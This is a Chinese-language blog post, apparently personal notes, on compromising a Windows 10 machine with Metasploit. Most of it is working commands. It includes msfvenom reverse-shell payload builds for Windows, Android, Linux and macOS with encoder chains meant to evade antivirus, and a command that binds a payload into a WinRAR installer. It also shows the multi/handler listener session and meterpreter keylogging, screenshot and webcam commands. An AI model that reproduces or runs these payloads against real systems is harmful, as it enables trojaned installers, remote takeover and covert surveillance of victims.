一次攻击(mateploit攻击windows 10总结)

攻击机:kali2018.3(需要一个metaploit)
受攻击者:windows10(需要关掉杀软,windows自带的也要关掉)


0x01生成

windows

$msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | \
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe

或者

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=45.32.94.102 LPORT=8888 -f exe > a.exe

android payload

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 R > androvirus.apk

linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

参考http://www.zerokeeper.com/tools/use-of-msfvenom.html
<Your IP Address>这里填的是攻击者的ip <Your Port to Connect On>这里填攻击者的端口

捆绑

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.156 LPORT=8888 -f exe -x winrar.exe -o payload_backdoor.exe

0x02使用

攻击者:监听
受害者:运行之前生成的程序

启动:root@kali:~/桌面# msfconsole
监听:

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.43.156
lhost => 192.168.43.156
msf exploit(multi/handler) > set lport 8888
lport => 8888
msf exploit(multi/handler) > run

192.168.43.156是攻击者的ip
8888是攻击者的端口
参考https://resources.infosecinstitute.com/how-to-attack-windows-10-machine-with-metasploit-on-kali-linux/#gref
这个时候双击可执行程序
在这里插入图片描述

对方上线啦^_^
遇到的错误
在这里插入图片描述
建立连接之后死了。
用上面的方法监听,关掉杀软之后windows这个问题就解决了。

在这里插入图片描述
可以设置后门
连接后门跟之前一样。


0x03连接之后的使用

reboot-重新启动受害人的计算机
keyscan_dump -键盘记录软件的内容转储
keyscan_start -启动时与如 Word 或浏览器的进程相关联的键盘记录软件
keyscan_stop -停止键盘记录软件
screenshot-抓取 meterpreter 桌面的屏幕截图
webcam_snap-拍照

参考
http://www.91ri.org/8476.html


0x04免杀
先占位,以后再补上吧_

  • 0
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值